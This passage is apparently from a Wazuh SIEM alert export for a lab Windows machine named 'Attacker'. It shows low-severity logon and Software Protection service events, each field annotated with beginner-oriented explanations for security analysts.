No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:38:35.2666112Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2353
Incremental log record number – handy for timeline order.

data.win.system.processID:  13324
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:36:35Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-18T16:36:35Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:22.317+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:22.317+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533882.53416
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:05.5675781Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43451
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:22.869+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:22.869+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533882.60751
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:43:41.5201262Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2355
Incremental log record number – handy for timeline order.

data.win.system.processID:  10268
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:36:41Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-18T16:36:41Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:23.837+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:23.837+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533883.62331
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:24.5733269Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43455
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x1E7FC0D Linked Logon ID: 0x1E7FD31 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x1e7fc0d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x1e7fd31
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:23.933+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:23.933+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533883.70051
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:53:02.6493207Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2359
Incremental log record number – handy for timeline order.

data.win.system.processID:  9524
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:37:02Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-18T16:37:02Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:23.956+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:23.956+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533883.71629
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:24.5733520Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43456
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: No Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x1E7FD31 Linked Logon ID: 0x1E7FC0D Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can 